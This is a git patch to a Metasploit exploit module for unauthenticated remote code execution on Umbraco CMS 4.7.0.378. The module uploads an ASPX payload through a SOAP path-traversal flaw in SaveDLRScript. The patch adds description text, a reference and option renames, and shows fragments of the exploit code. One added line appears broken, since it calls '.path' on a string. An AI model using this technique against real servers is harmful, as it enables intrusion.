From 9fecc80459112d1ed2e67119cdd9e8d314250ebc Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 6 Jul 2012 15:47:25 +0200 Subject: [PATCH] User of TARGETURI plus improve of description --- .../windows/http/umbraco_upload_aspx.rb | 29 ++++++++++++------- 1 file changed, 18 insertions(+), 11 deletions(-) diff --git a/modules/exploits/windows/http/umbraco_upload_aspx.rb b/modules/exploits/windows/http/umbraco_upload_aspx.rb index cb0555dd18..7bda41c520 100644 --- a/modules/exploits/windows/http/umbraco_upload_aspx.rb +++ b/modules/exploits/windows/http/umbraco_upload_aspx.rb @@ -17,24 +17,29 @@ class Metasploit3 < Msf::Exploit::Remote super( 'Name' => 'Umbraco CMS Remote Command Execution', 'Description' => %q{ - This module can be used to execute a payload on Umbraco CMS - 4.7.0.378. The payload is uploaded as an ASPX script by - sending a specially crafted SOAP request to codeEditorSave.asmx, - which permits unauthorised file upload via the SaveDLRScript operation. - SaveDLRScript is also subject to a path traversal vulnerability, - allowing code to be placed into the web-accessible /umbraco/ directory. + This module can be used to execute a payload on Umbraco CMS 4.7.0.378. + The payload is uploaded as an ASPX script by sending a specially crafted + SOAP request to codeEditorSave.asmx, which permits unauthorised file upload + via the SaveDLRScript operation. SaveDLRScript is also subject to a path + traversal vulnerability, allowing code to be placed into the web-accessible + /umbraco/ directory. The module writes, executes and then overwrites an ASPX script; note that - though the script content is removed, the file remains on the target. + though the script content is removed, the file remains on the target. Automatic + cleanup of the file is intended if a meterpreter payload is used. + + This module has been tested successfully on Umbraco CMS 4.7.0.378 on a Windows + 7 32-bit SP1. In this scenario, the "IIS APPPOOL\ASP.NET v4.0" user must have + write permissions on the Windows Temp folder. }, 'Author' => [ 'Toby Clarke' # Vulnerability discovery and Metasploit module ], - 'Version' => '$Revision: $', 'Platform' => 'win', 'References' => [ - [ 'URL', 'http://blog.gdssecurity.com/labs/2012/7/3/find-bugs-faster-with-a-webmatrix-local-reference-instance.html' ] + [ 'URL', 'http://blog.gdssecurity.com/labs/2012/7/3/find-bugs-faster-with-a-webmatrix-local-reference-instance.html' ], + [ 'URL', 'http://umbraco.codeplex.com/workitem/18192' ] # Item deleted for security reasons ], 'Targets' => [ @@ -47,7 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ - OptString.new('PATH', [ true, "The URI path of the Umbraco login page", '/umbraco']) + OptString.new('TARGETURI', [true, 'The URI path of the Umbraco login page', '/umbraco/']) ], self.class) end @@ -94,7 +99,9 @@ class Metasploit3 < Msf::Exploit::Remote # htmlentities like encoding aspx = aspx.gsub("&", "&").gsub("\"", """).gsub("'", "'").gsub("<", "<").gsub(">", ">") - uri_path = (datastore['PATH'][-1,1] == "/" ? datastore['PATH'] : datastore['PATH'] + "/") + uri_path = target_uri.path + uri_path.path << "/" if uri_path[-1, 1] != "/" + @upload_random = rand_text_alpha(rand(6) + 6) soap = <<-eos